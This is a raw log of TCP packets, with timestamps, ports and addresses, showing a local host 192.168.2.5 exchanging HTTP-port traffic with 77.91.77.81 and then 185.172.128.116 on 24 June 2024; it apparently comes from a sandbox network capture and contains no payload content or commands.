Jun 24, 2024 00:10:09.510123014 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.510200024 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.510210991 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.510221004 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.510231018 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.510255098 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.510286093 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.510365009 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.510375977 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.510385036 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.510418892 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.510448933 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.510482073 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.510490894 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.510500908 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.510529041 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.510559082 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.510569096 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.510590076 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.510601044 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.510611057 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.510616064 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.510646105 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.510674000 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.510725975 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.510735989 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.510746002 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.510768890 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.510771990 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.510802984 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.510802984 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.510848045 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.510858059 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.510874987 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.510895014 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.510915995 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.510989904 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.511029959 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.511039972 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.511039972 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.511075020 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.511097908 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.511106968 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.511116028 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.511151075 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.511173010 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.511183023 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.511193037 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.511213064 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.511224985 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.511256933 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.511256933 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.511311054 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.511320114 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.511329889 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.511358023 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.511384964 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.511498928 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.511508942 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.511518955 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.511529922 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.511540890 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.511539936 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.511562109 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.511569977 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.511590004 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.511594057 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.511606932 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.511607885 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.511641979 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.511668921 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.511748075 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.511758089 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.511768103 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.511778116 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.511790991 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.511792898 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.511801004 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.511811972 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.511821032 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.511821985 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.511841059 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.511864901 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.514739037 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.514749050 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.514784098 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.514797926 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.514805079 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.514834881 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.514851093 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.514856100 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.514883995 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.514894962 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.514899969 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.514925957 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.514954090 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.514987946 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.514997959 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.515007019 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.515029907 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.515044928 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.515048981 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.515074968 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.515075922 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.515120983 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.596508980 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.596524954 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.596535921 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.596576929 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.596587896 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.596599102 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.596610069 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.596645117 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.596698046 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.596725941 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.596736908 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.596746922 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.596759081 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.596771002 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.596771955 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.596793890 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.596808910 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.596936941 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.596947908 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.596959114 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.596970081 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.596982002 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.596987009 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.596995115 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.597017050 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.597037077 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.597054005 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.597103119 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.626964092 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.626979113 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.626996994 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627007961 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627018929 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627029896 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627063990 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627068996 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.627074957 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627110004 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627113104 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.627121925 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627125025 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.627132893 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627160072 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.627183914 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.627208948 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627219915 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627230883 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627243042 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627254009 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.627286911 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627290010 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.627290010 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.627331018 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.627379894 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627393007 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627410889 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627424002 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627434015 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.627437115 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627450943 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627489090 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.627489090 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.627618074 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627629995 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627640009 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627652884 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627665997 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627675056 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627701044 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.627701044 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.627737045 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.627811909 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627830029 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627840996 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627851963 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627865076 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627866030 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.627878904 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627901077 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.627928972 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.627945900 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627957106 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627968073 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.627995968 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.628026962 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.628088951 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.628101110 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.628114939 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.628127098 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.628139019 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.628138065 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.628149986 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.628155947 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.628190994 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.628271103 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.628283024 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.628293037 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.628304005 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.628325939 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.628328085 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.628338099 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.628348112 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.628350019 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.628364086 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.628365993 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.628376007 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.628387928 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.628395081 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.628417015 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.628443956 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.628684044 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.628695011 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.628705025 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.628716946 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.628729105 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.628736973 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.628741980 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.628752947 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.628761053 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.628765106 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.628776073 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.628782988 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.628788948 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.628806114 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.628858089 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.628858089 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.629565001 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.629575968 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.629586935 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.629596949 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.629615068 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.629621983 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.629633904 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.629643917 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.629646063 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.629657984 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.629668951 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.629681110 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.629690886 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.629697084 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.629697084 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.629704952 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.629717112 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.629724026 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.629729033 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.629738092 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.629740953 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.629753113 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.629765034 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.629770041 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.629776955 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.629787922 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.629798889 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.629801989 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.629811049 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.629821062 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.629823923 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.629837036 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.629839897 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.629848003 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.629858971 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.629862070 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.629889965 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.629906893 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:10.278681993 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:10.279164076 CEST	49710	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:10.284151077 CEST	80	49710	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:10.284240007 CEST	49710	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:10.284370899 CEST	49710	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:10.284404039 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:10.284461975 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:10.289308071 CEST	80	49710	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:11.951709032 CEST	80	49710	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:11.951797009 CEST	49710	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:11.951935053 CEST	80	49710	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:11.951999903 CEST	49710	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:11.952256918 CEST	80	49710	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:11.952311039 CEST	49710	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:11.952728987 CEST	80	49710	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:11.952780008 CEST	49710	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:11.956430912 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:11.962002993 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:11.962125063 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:11.962224007 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:11.967052937 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.626422882 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.626465082 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.626476049 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.626509905 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.626519918 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.626527071 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.626533985 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.626611948 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.626626015 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.626638889 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.626657009 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.626702070 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.626738071 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.626738071 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.631587029 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.631679058 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.720988035 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.721008062 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.721025944 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.721069098 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.721079111 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.721121073 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.721133947 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.721146107 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.721152067 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.721184015 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.721194029 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.721199989 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.721220016 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.721241951 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.721976995 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.721992970 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.722007990 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.722037077 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.722058058 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.722062111 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.722078085 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.722111940 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.722148895 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.722841024 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.722856045 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.722879887 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.722893000 CEST	49711	80	192.168.2.5	185.172.128.116
